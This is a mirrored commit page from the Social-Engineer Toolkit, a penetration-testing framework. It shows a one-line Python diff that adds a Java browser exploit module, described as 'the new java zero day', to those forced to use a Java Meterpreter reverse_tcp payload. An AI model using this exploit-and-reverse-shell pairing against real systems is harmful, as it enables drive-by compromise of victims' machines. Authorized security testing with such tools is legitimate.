mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-04-04 06:46:08 +00:00
Forced java meterpreter for the new java zero day
This commit is contained in:
parent
fcf8739258
commit
1de0c8cbc3
1 changed files with 1 additions and 1 deletions
|
@ -93,7 +93,7 @@ if choice1 == '':choice1 ='2'
|
|||
choice1 = ms_payload(choice1)
|
||||
|
||||
# if we are using the java exploit
|
||||
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec":
|
||||
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean":
|
||||
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
|
||||
choice1 = ("java/meterpreter/reverse_tcp")
|
||||
|
||||
|
|
Loading…
Add table
Reference in a new issue